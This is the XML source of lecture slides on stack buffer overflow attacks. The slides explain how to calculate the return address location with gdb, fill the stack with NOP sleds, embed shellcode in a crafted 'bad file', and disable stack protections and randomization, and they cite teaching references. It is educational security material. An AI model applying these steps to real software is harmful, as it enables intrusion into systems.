          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="242" name="Google Shape;242;p28"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5819075" y="753275"/>
            <a:ext cx="21600" cy="3889800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="243" name="Google Shape;243;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5839425" y="947300"/>
            <a:ext cx="1367700" cy="65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Malicious code </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="244" name="Google Shape;244;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7198675" y="1978300"/>
            <a:ext cx="656283" cy="864100"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="34564" w="39823">
                <a:moveTo>
                  <a:pt x="0" y="34564"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="6636" y="31574"/>
                  <a:pt x="39741" y="22387"/>
                  <a:pt x="39814" y="16626"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="39887" y="10865"/>
                  <a:pt x="7001" y="2771"/>
                  <a:pt x="438" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="245" name="Google Shape;245;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5839425" y="1914150"/>
            <a:ext cx="1367700" cy="33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NOP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="246" name="Google Shape;246;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5839425" y="1609350"/>
            <a:ext cx="1367700" cy="33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NOP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="247" name="Google Shape;247;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2330475" y="2996763"/>
            <a:ext cx="495250" cy="1196175"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="47847" w="19810">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="13147" y="1461"/>
                  <a:pt x="22953" y="22416"/>
                  <a:pt x="18770" y="34965"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17499" y="38777"/>
                  <a:pt x="15783" y="42934"/>
                  <a:pt x="12513" y="45270"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9341" y="47536"/>
                  <a:pt x="4591" y="46103"/>
                  <a:pt x="1104" y="47847"/>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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="156000" y="7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Stack Overflow Consequences</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="253" name="Google Shape;253;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="875750"/>
            <a:ext cx="8520600" cy="369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Overwriting return address with some random address can point to :</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Invalid instruction</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Non-existing address</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Access violation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Attacker’s code -&gt; Malicious code to gain access</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>How to know where the return address is stored in the stack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>How to construct malicious code </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>How to let the return address point to malicious code</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="254" name="Google Shape;254;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="470500" y="3742675"/>
            <a:ext cx="61593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u="sng"/>
              <a:t>Make sure to turn off </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500" u="sng"/>
              <a:t>stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500" u="sng"/>
              <a:t> protections:</a:t>
            </a:r>
            <a:endParaRPr sz="1500" u="sng"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="255" name="Google Shape;255;p29"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="352425" y="4645075"/>
            <a:ext cx="8439150" cy="219075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="256" name="Google Shape;256;p29"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="401167" y="4305525"/>
            <a:ext cx="7548141" cy="219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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="156000" y="7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Address Calculation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="262" name="Google Shape;262;p30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="875750"/>
            <a:ext cx="6318300" cy="3693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Return address location : $ebp + 4  -- don’t know $ebp</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Calculate $ebp based on its distance to the buffer base address </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Can use gdb to check these addresses: buffer base address, frame pointer (in ebp) (make sure to disable randomize memory)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>return address location = buffer base address +</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng"/>
              <a:t> distance between $ebp and buffer base address +  4 </a:t>
            </a:r>
            <a:endParaRPr u="sng"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Return address value &gt;= return address location + 4</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Specify the address of malicious code</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Malicious code is passed as arguments</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Use NOP instructions to increase the chance of jumping to the correct address of malicious code</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Construct the bad file. Embed the return address and malicious code into the file.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="263" name="Google Shape;263;p30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6753825" y="3553900"/>
            <a:ext cx="1367700" cy="65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buff[99]</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buff[0]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="264" name="Google Shape;264;p30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6753825" y="2530075"/>
            <a:ext cx="1367700" cy="51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Overwrite with new addr</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="265" name="Google Shape;265;p30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6753825" y="2218950"/>
            <a:ext cx="1367700" cy="33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NOP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="266" name="Google Shape;266;p30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6753825" y="3015350"/>
            <a:ext cx="13677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overwrite</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="267" name="Google Shape;267;p30"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="8090125" y="3594250"/>
            <a:ext cx="360600" cy="1200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="268" name="Google Shape;268;p30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8264100" y="3026400"/>
            <a:ext cx="1996500" cy="6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br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>(ebp) </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="269" name="Google Shape;269;p30"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8111625" y="731400"/>
            <a:ext cx="11100" cy="3839700"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="270" name="Google Shape;270;p30"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6733475" y="753275"/>
            <a:ext cx="21600" cy="3889800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="271" name="Google Shape;271;p30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6753825" y="947300"/>
            <a:ext cx="1367700" cy="65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Malicious code </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="272" name="Google Shape;272;p30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8113075" y="1978300"/>
            <a:ext cx="656283" cy="864100"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="34564" w="39823">
                <a:moveTo>
                  <a:pt x="0" y="34564"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="6636" y="31574"/>
                  <a:pt x="39741" y="22387"/>
                  <a:pt x="39814" y="16626"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="39887" y="10865"/>
                  <a:pt x="7001" y="2771"/>
                  <a:pt x="438" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="273" name="Google Shape;273;p30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6753825" y="1914150"/>
            <a:ext cx="1367700" cy="33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NOP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="274" name="Google Shape;274;p30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6753825" y="1609350"/>
            <a:ext cx="1367700" cy="33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NOP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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="156000" y="7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Shell Code</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="280" name="Google Shape;280;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365175" y="929225"/>
            <a:ext cx="8520600" cy="3693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Shell code is commonly used to gain more access of the system</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Sd</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>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Challenges :</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Loader Issue						</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Zeros in the code</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="281" name="Google Shape;281;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="499438" y="1339150"/>
            <a:ext cx="7991475" cy="1666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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="156000" y="7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Shell Code</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="287" name="Google Shape;287;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="875750"/>
            <a:ext cx="8520600" cy="369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8" name="Google Shape;288;p32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="347663" y="1278088"/>
            <a:ext cx="8448675" cy="3381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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="156000" y="7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Shell Code</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="294" name="Google Shape;294;p33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="875750"/>
            <a:ext cx="8520600" cy="369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5" name="Google Shape;295;p33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1324950" y="1010563"/>
            <a:ext cx="6858000" cy="3971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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="156000" y="7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68" name="Google Shape;68;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="875750"/>
            <a:ext cx="8520600" cy="3693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Michael Howard, David LeBlanc, John Viega. 24 Deadly Sins of Software Security </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>SEED Book: Wenliang Du. Computer Security: A Hands-on Approach (Chapter 4).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.handsonsecurity.net/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>OWASP Buffer Overflow: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.owasp.org/index.php/Buffer_Overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
